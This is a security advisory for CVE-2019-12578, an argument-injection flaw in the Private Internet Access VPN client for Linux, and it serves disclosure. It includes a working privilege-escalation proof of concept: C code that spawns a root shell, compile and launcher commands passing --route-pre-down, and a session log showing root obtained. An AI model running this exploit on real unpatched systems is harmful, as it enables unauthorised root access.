Allele Security Alert
ASA-2019-00384
Identifier(s)
ASA-2019-00384, CVE-2019-12578
Title
Argument Injection
Vendor(s)
London Trust Media
Product(s)
Private Internet Access (PIA) VPN Client
Affected version(s)
Private Internet Access (PIA) VPN Client for Linux version v82
Fixed version(s)
Private Internet Access (PIA) VPN Client for Linux version v1.2.1
Proof of concept
Yes
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux could allow an authenticated, local attacker to run arbitrary code with elevated privileges.
Technical details
The PIA Linux binary openvpn_launcher.64 is setuid root. This binary executes /opt/pia/openvpn-64/openvpn passing the parameters provided from the command line. Care was taken to programmatically blacklist potentially dangerous openvpn parameters, however the –route-pre-down parameter is not. This parameter accepts an arbitrary path to a script/program to be executed when OpenVPN exits. The –script-security parameter also needs to be passed to allow for this action to be taken. –script-security is not currently in the blacklist. A local unprivileged user can pass a malicious script/binary to the – route-pre-down option and will be executed when openvpn is stopped.
All steps are executed as a low privileged user.
Step 1 – Create woot.c to spawn a shell when executed.
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argvc, char **arv){
setreuid(0,0);
execl("/bin/sh","/bin/sh",NULL);
}
Step 2 – Compile the malicious binary
gcc -fPIC -o woot -Wall -c woot.c
Step 3 – Execute openvpn_launcher.64 with the –route-pre-down parameter with the path to the woot program. In 5 seconds a root shell will be spawned.
Note: Using the timeout program is optional. The command can be executed without this but you will need to enter the control-c sequence to kill the openvpn process.
/usr/bin/timeout --signal=SIGINT 5s /opt/pia/openvpn_launcher.64 \ --route-pre-down $PWD/woot --dev tun0 --script-security 2
Step 4 – At this point the OpenVPN process will be running. Enter the control-c if the timeout program was not used.
Example
user1@woot:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
user1@woot:~$ cat woot.c
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argvc, char **arv){
setreuid(0,0);
execl("/bin/sh","/bin/sh",NULL);
}
user1@woot:~$ gcc -Wall -o woot woot.c
user1@woot:~$ /usr/bin/timeout --signal=SIGINT 5s /opt/pia/openvpn_launcher.64 \
--route-pre-down $PWD/woot --dev tun0 --script-security 2
Wed Dec 26 16:54:56 2018 disabling NCP mode (--ncp-disable) because not in P2MP client or server mode
Wed Dec 26 16:54:56 2018 OpenVPN 2.4.6 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [EPOLL] [MH/PKTINFO] [AEAD] built on Jul 26 2018
Wed Dec 26 16:54:56 2018 library versions: OpenSSL 1.1.0h 27 Mar 2018, LZO 2.06
Wed Dec 26 16:54:56 2018 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Wed Dec 26 16:54:56 2018 ******* WARNING *******: All encryption and authentication features disabled -- All data will be tunnelled as clear text and will not be protected against man-in-the-middle changes. PLEASE DO RECONSIDER THIS CONFIGURATION!
Wed Dec 26 16:54:57 2018 TUN/TAP device tun0 opened
Wed Dec 26 16:54:57 2018 Could not determine IPv4/IPv6 protocol. Using AF_INET
Wed Dec 26 16:54:57 2018 UDPv4 link local (bound): [AF_INET][undef]:1194
Wed Dec 26 16:54:57 2018 UDPv4 link remote: [AF_UNSPEC]
Wed Dec 26 16:55:01 2018 event_wait : Interrupted system call (code=4)
Wed Dec 26 16:55:01 2018 /home/user1/woot tun0 1500 1500 init
# id
uid=0(root) gid=1001(user1) groups=1001(user1)
#
Credits
Rich Mirch
Reference(s)
PIA Linux Privilege Escalation: Argument Injection
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12578.txt
CVE-2019-12578
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12578
CVE-2019-12578
https://nvd.nist.gov/vuln/detail/CVE-2019-12578
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: June 25, 2019